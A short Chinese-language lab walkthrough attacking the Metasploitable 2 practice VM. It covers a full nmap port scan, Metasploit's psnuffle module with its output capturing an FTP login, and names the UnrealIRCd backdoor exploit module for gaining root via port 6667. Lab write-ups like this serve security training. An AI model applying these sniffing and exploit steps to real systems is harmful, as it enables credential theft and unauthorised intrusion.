Metasploitable 2简单使用
Metasploitable默认的用户名是 :msfadmin 密码是: msfadmin
登陆之后使用ip addr 查看ip地址,本例中的IP地址是:192.168.68.139,可能与您的实际环境不同。
在parrot里面使用nmap扫描靶机全部的端口。
sudo nmap -p0-65535 192.168.68.139
21端口密码嗅探案例
本次使用的模块:auxiliary/sniffer/psnuffle
首先配置好Metasploit,Metasploit要以管理员身份启动。
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > exploit
[*] Auxiliary module running as background job 1.
[*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
[*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
[*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
[*] Loaded protocol SMB from /usr/share/metasploit-framework/data/exploits/psnuffle/smb.rb...
[*] Loaded protocol URL from /usr/share/metasploit-framework/data/exploits/psnuffle/url.rb...
[*] Sniffing traffic.....
使用xshell登陆ftp服务器
[e:\~]$ ftp [email protected]
Connecting to 192.168.68.139:21...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
220 (vsFTPd 2.3.4)
msfadmin
331 Please specify the password.
230 Login successful.
ftp:/home/msfadmin>
嗅探成功
通过6667端口攻击靶机的示例
首先启动我们的大杀器Metasploit
本次攻击使用的模块为exploit/unix/irc/unreal_ircd_3281_backdoor
几行命令过去。拿到服务器root权限,是不是特别爽